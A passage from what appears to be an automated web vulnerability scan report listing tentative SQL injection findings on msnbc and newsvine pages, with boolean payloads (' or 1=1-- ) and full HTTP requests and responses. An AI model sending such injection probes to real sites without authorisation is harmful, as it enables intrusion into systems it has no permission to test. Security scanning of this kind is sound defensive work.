Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/41330515'%20and%201%3d1--%20/ns/us_news-life/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 03:13:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 65044


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:-1075847512 -->
<title>SF weighs free parking for nannies - U.S. news - Life - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/41330515/ns/us_news-life/" property="og:url" /><meta content="2011-01-30T00:03:37" property="og:updated" /><meta content="SF weighs free parking for nannies - U.S. news - Life - msnbc.com" name="title" /><meta content="Free parking for nannies? Maybe in San Fran " property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="ROBIN HINDERY" property="og:author" /><meta content="The Associated Press" property="og:publisher" /><meta content="San Francisco, California, Roxanne Stachon, U.S. News, California, US, Transportation, Family issues, Social affairs, Industrial products and services, Industries, Business, Government policy, Government and politics, Health care industry, General news, Article, LowPri, r, AP" name="keywords" property="og:tags" /><meta content="/ap/nannies%20park%20free-902595433_v2.jpg" name="Search.Image" /><meta content="http://msnbcmedia4.redacted/j/ap/nannies park free-902595433_v2.standard.jpg" property="og:image" /><meta content="AP" name="Search.ImageSource" /><meta content="23294612872" property="fb:page_id" /><meta content="One category of drivers may soon get a break, thanks to a group of local parents who are lobbying for car-owning nannies to be included in the city's residential parking permit program. " name="description" property="og:description" /><meta content="Sun, 30 Jan 2011 00:03:37 GMT" name="Search.Update" />
<link rel="canonical" href="http://www.msnbc.redacted/id/41330515/ns/us_news-life/" />
<link href="http://assets1a.msnbc.redacted/rendering/msnbc/html40/assets/img
...[SNIP]...

Request 2

GET /id/41330515'%20and%201%3d2--%20/ns/us_news-life/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 03:13:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 64952


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:490236436 -->
<title>SF weighs free parking for nannies - U.S. news - Life - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/41330515/ns/us_news-life/" property="og:url" /><meta content="2011-01-30T00:03:37" property="og:updated" /><meta content="SF weighs free parking for nannies - U.S. news - Life - msnbc.com" name="title" /><meta content="Free parking for nannies? Maybe in San Fran " property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="ROBIN HINDERY" property="og:author" /><meta content="The Associated Press" property="og:publisher" /><meta content="San Francisco, California, Roxanne Stachon, U.S. News, California, US, Transportation, Family issues, Social affairs, Industrial products and services, Industries, Business, Government policy, Government and politics, Health care industry, General news, Article, LowPri, r, AP" name="keywords" property="og:tags" /><meta content="/ap/nannies%20park%20free-902595433_v2.jpg" name="Search.Image" /><meta content="http://msnbcmedia4.redacted/j/ap/nannies park free-902595433_v2.standard.jpg" property="og:image" /><meta content="AP" name="Search.ImageSource" /><meta content="23294612872" property="fb:page_id" /><meta content="One category of drivers may soon get a break, thanks to a group of local parents who are lobbying for car-owning nannies to be included in the city's residential parking permit program. " name="description" property="og:description" /><meta content="Sun, 30 Jan 2011 00:03:37 GMT" name="Search.Update" />
<link rel="canonical" href="http://www.msnbc.redacted/id/41330515/ns/us_news-life/" />
<link href="http://assets1b.msnbc.redacted/rendering/msnbc/html40/assets/img/a
...[SNIP]...

1.126. http://www.msnbc.redacted/id/41330876/ns/world_news-europe/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.msnbc.redacted
Path:   /id/41330876/ns/world_news-europe/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 85220830'%20or%201%3d1--%20 and 85220830'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id85220830'%20or%201%3d1--%20/41330876/ns/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Cnection: close
Content-Length: 1245
Date: Sun, 30 Jan 2011 01:55:47 GMT
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>

Request 2

GET /id85220830'%20or%201%3d2--%20/41330876/ns/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:55:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 99480

<html xmlns:tvservices="http://www.msnbc.com"><head><title>Page not found - About- msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="stylesheet" type="text/css" href="/default.ashx/id/21589549" /><link rel="stylesheet" type="text/css" href="/default.ashx/id/21731378" /><script type="text/javascript" src="/js/std.js"></script><script type="text/javascript" src="/id/23149822"></script><script type="text/javascript">gEnabled=false;</script><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta http-equiv="pics-label" content="(pics-1.1 &quot;http://www.icra.org/ratingsv02.html&quot; l gen true for &quot;http://www.msnbc.redacted&quot; r (nz 1vz 1lz 1oz 1cz 1) &quot;http://www.rsac.org/ratingsv01.html&quot; l gen true for &quot;http://www.msnbc.redacted&quot; r (l 0n 0s 0v 0))"><meta name="robots" content="noindex"><meta name="description" content="Error 404"><meta name="Search.Document" content="story"><meta name="Search.Title" content="We cannot find the page you requested."><meta name="Search.Updated" content="Thu, 11 Mar 2010 22:11:14 GMT"><meta name="Search.Expires" content="Fri, 31 Dec 9999 23:59:59 GMT"><meta name="GOOGLEBOT" content="unavailable_after: 31-Dec-9999 23:59:59 GMT"><meta name="Search.Section" content="About"><link rel="alternate" type="application/rss+xml" title="MSNBC - Top msnbc.com headlines" href="http://www.msnbc.redacted/id/3032091/device/rss/rss.xml" xmlns:media="http://search.yahoo.com/mrss/" /><link rel="alternate" type="application/rss+xml" title="MSNBC - Top Stories" href="http://rss.msnbc.redacted/id/3032091/device/rss/rss.xml"><script language="javascript" type="text/javascript">
this.nm_bo = function (o)
{
//newsmenu delay
if (nm_Enter)
{
window.clearTimeout(nm_Enter);
nm_Enter = 0;
}
// Get initiating button
if (o)
{
o2 = o.relatedTarget;
o = o.target;
}
else
{
o = window.event.srcElement;
o2 = window.ev
...[SNIP]...

1.127. http://www.msnbc.redacted/id/41330876/ns/world_news-europe/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.msnbc.redacted
Path:   /id/41330876/ns/world_news-europe/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/41330876/ns/world_news-europe/?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:55:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 56569


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:-1075847508 -->
<title>Train crash in Germany kills 10, injures 33 - World news - Europe - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/41330876/ns/world_news-europe/" property="og:url" /><meta content="Mon, 28 Feb 2011 01:22:40 GMT" property="og:expires" /><meta content="unavailable_after: Mon, 28 Feb 2011 01:22:40 GMT" name="GOOGLEBOT" /><meta content="2011-01-30T01:22:40" property="og:updated" /><meta content="Train crash in Germany kills 10, injures 33 - World news - Europe - msnbc.com" name="title" /><meta content="Train crash in Germany kills 10, injures 33" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="JUERGEN BAETZ" property="og:author" /><meta content="The Associated Press" property="og:publisher" /><meta content="Eastern Germany, Train wreck, World News, Germany, Europe, Accidents, Transportation accidents, Accidents and disasters, General news, Transportation, Industrial products and services, Industries, Business, Article, LowPri, u, AP" name="keywords" property="og:tags" /><meta content="23294612872" property="fb:page_id" /><meta content="A head-on train crash in eastern Germany killed 10 people and injured at least 33 others, eight of them severely, local firefighters said Sunday." name="description" property="og:description" /><meta content="Mon, 28 Feb 2011 01:22:40 GMT" name="Search.Expires" /><meta content="Sun, 30 Jan 2011 01:22:40 GMT" name="Search.Update" />
<link rel="canonical" href="http://www.msnbc.redacted/id/41330876/ns/world_news-europe/" />
<link href="http://assets1a.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>

<link rel="stylesheet"
...[SNIP]...

Request 2

GET /id/41330876/ns/world_news-europe/?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:55:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 56523


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:1695234872 -->
<title>Train crash in Germany kills 10, injures 33 - World news - Europe - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/41330876/ns/world_news-europe/" property="og:url" /><meta content="Mon, 28 Feb 2011 01:22:40 GMT" property="og:expires" /><meta content="unavailable_after: Mon, 28 Feb 2011 01:22:40 GMT" name="GOOGLEBOT" /><meta content="2011-01-30T01:22:40" property="og:updated" /><meta content="Train crash in Germany kills 10, injures 33 - World news - Europe - msnbc.com" name="title" /><meta content="Train crash in Germany kills 10, injures 33" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="JUERGEN BAETZ" property="og:author" /><meta content="The Associated Press" property="og:publisher" /><meta content="Eastern Germany, Train wreck, World News, Germany, Europe, Accidents, Transportation accidents, Accidents and disasters, General news, Transportation, Industrial products and services, Industries, Business, Article, LowPri, u, AP" name="keywords" property="og:tags" /><meta content="23294612872" property="fb:page_id" /><meta content="A head-on train crash in eastern Germany killed 10 people and injured at least 33 others, eight of them severely, local firefighters said Sunday." name="description" property="og:description" /><meta content="Mon, 28 Feb 2011 01:22:40 GMT" name="Search.Expires" /><meta content="Sun, 30 Jan 2011 01:22:40 GMT" name="Search.Update" />
<link rel="canonical" href="http://www.msnbc.redacted/id/41330876/ns/world_news-europe/" />
<link href="http://assets1d.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>

<link rel="stylesheet"
...[SNIP]...

1.128. http://www.msnbc.redacted/id/8004316/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.msnbc.redacted
Path:   /id/8004316/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 42860396'%20or%201%3d1--%20 and 42860396'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/8004316/?142860396'%20or%201%3d1--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sun, 30 Jan 2011 01:59:31 GMT
Date: Sun, 30 Jan 2011 01:59:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 163390

<html><head><title>Top Videos - Videos &amp; Clips of Top News Stories &amp; Headlines - msnbc.com- msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="styleshe
...[SNIP]...
<img src="http://c.redacted/c.gif?NC=1180&NA=1154&PS=69715&PI=7329&DI=305&TP=http%3a%2f%2fmsnbc.msn.com%2fid%2f8004316%2f
&RID=76faf60ebb3048f380f19f80f363b3cb" width="0" height="0" border="0" alt="" /><div id="nm_c1" class="nmX"> </div><div id="nm_c2" class="nmX"> </div><div id="nm_c3" class="nmX"> </div><div id="nm_c4" class="nmX"> </div>
<script language="JavaScript" type="text/javascript">
var tpValue='http%3a%2f%2fmsnbc.redacted%2fid%2f8004316%2f';
var psValue='NC=1255&amp;NA=1154&amp;PS=69715&amp;PI=7329&amp;DI=305';
psValue=psValue.substr(psValue.indexOf("PS="));
psValue=psValue.substr(3,psValue.indexOf("&amp;")-3);
var diValue='NC=1255&amp;NA=1154&amp;PS=69715&amp;PI=7329&amp;DI=305';
diValue=diValue.substr(diValue.indexOf("DI="));
diValue=diValue.substr(3);
var piValue='NC=1255&amp;NA=1154&amp;PS=69715&amp;PI=7329&amp;DI=305';
piValue=piValue.substr(piValue.indexOf("PI="));
piValue=piValue.substr(3,piValue.indexOf("&amp;")-3);

$.track({trackInfoOpts:{sitePage:{pageName:s_msn.pageName,domainId:diValue,propertyId:piValue,propertySpecific:psValue,sourceUrl:document.URL,tp:'http%3a%2f%2fmsnbc.redacted%2fid%2f8004316%2f',referrer:document.referrer},userStatic:{requestId:'76faf60ebb3048f380f19f80f363b3cb'}},spinTimeout:150})
.register(new $.track.genericTracking({base:"http://udc.redacted/c.gif?",linkTrack:0,commonMap:{sitePage:{di:'domainId',pn:'pageName',pi:'propertyId',ps:'propertySpecific',su:'sourceUrl',cu:'tp'} ,
userStatic:{rid:'requestId',clid:'requestId'},
client:{rf:'referrer',bh:'height',bw:'width',scr:'screenResolution',sd:'colorDepth'}},impr:{param:{evt:'impr',js:'1'}}}));
</script><script type="text/javascript">
$.track.trackPage();
</script><div style="display:none;">
<script type="text/javascript">
var axel = Math.random() + "";
var a = axel * 10000000000000;
document.write('<img src="http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=' + a + '?" width="1" height="1" alt=""/>');
</script>
<noscript>
<img src="http://ad.doubleclick.ne
...[SNIP]...

Request 2

GET /id/8004316/?142860396'%20or%201%3d2--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sun, 30 Jan 2011 01:59:32 GMT
Date: Sun, 30 Jan 2011 01:59:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 165323

<html><head><title>Top Videos - Videos &amp; Clips of Top News Stories &amp; Headlines - msnbc.com- msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="styleshe
...[SNIP]...
<img src="http://c.redacted/c.gif?NC=1180&NA=1154&PS=69715&PI=7329&DI=305&TP=http%3a%2f%2fmsnbc.msn.com%2fid%2f8004316%2f
&RID=c70c5131d3b644bfbb8884572e01c494" width="0" height="0" border="0" alt="" /><div id="nm_c1" class="nmX"> </div><div id="nm_c2" class="nmX"> </div><div id="nm_c3" class="nmX"> </div><div id="nm_c4" class="nmX"> </div>
<script language="JavaScript" type="text/javascript">
var tpValue='http%3a%2f%2fmsnbc.redacted%2fid%2f8004316%2f';
var psValue='NC=1255&amp;NA=1154&amp;PS=69715&amp;PI=7329&amp;DI=305';
psValue=psValue.substr(psValue.indexOf("PS="));
psValue=psValue.substr(3,psValue.indexOf("&amp;")-3);
var diValue='NC=1255&amp;NA=1154&amp;PS=69715&amp;PI=7329&amp;DI=305';
diValue=diValue.substr(diValue.indexOf("DI="));
diValue=diValue.substr(3);
var piValue='NC=1255&amp;NA=1154&amp;PS=69715&amp;PI=7329&amp;DI=305';
piValue=piValue.substr(piValue.indexOf("PI="));
piValue=piValue.substr(3,piValue.indexOf("&amp;")-3);

$.track({trackInfoOpts:{sitePage:{pageName:s_msn.pageName,domainId:diValue,propertyId:piValue,propertySpecific:psValue,sourceUrl:document.URL,tp:'http%3a%2f%2fmsnbc.redacted%2fid%2f8004316%2f',referrer:document.referrer},userStatic:{requestId:'c70c5131d3b644bfbb8884572e01c494'}},spinTimeout:150})
.register(new $.track.genericTracking({base:"http://udc.redacted/c.gif?",linkTrack:0,commonMap:{sitePage:{di:'domainId',pn:'pageName',pi:'propertyId',ps:'propertySpecific',su:'sourceUrl',cu:'tp'} ,
userStatic:{rid:'requestId',clid:'requestId'},
client:{rf:'referrer',bh:'height',bw:'width',scr:'screenResolution',sd:'colorDepth'}},impr:{param:{evt:'impr',js:'1'}}}));
</script><script type="text/javascript">
$.track.trackPage();
</script><div style="display:none;">
<script type="text/javascript">
var axel = Math.random() + "";
var a = axel * 10000000000000;
document.write('<img src="http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=' + a + '?" width="1" height="1" alt=""/>');
</script>
<noscript>
<img src="http://ad.doubleclick.ne
...[SNIP]...

1.129. http://www.polls.newsvine.com/_nv/cms/help/faq [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.polls.newsvine.com
Path:   /_nv/cms/help/faq

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 77049328'%20or%201%3d1--%20 and 77049328'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_nv/cms/help77049328'%20or%201%3d1--%20/faq HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:19:10 GMT
Content-Length: 15052
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&amp;x=0|26&amp;get=error-page&amp;rand=1199522382&amp;do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&amp;x=0|26&amp;get=error-page&amp;rand=1199522382&amp;do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.co
...[SNIP]...

Request 2

GET /_nv/cms/help77049328'%20or%201%3d2--%20/faq HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:19:10 GMT
Content-Length: 15042
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&amp;x=0|26&amp;get=error-page&amp;rand=908514525&amp;do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&amp;x=0|26&amp;get=error-page&amp;rand=908514525&amp;do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.com/
...[SNIP]...

1.130. http://www.polls.newsvine.com/_static/css/7df13afbd185e2574d9f79651dc425a61a7d8525.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.polls.newsvine.com
Path:   /_static/css/7df13afbd185e2574d9f79651dc425a61a7d8525.css

Issue detail

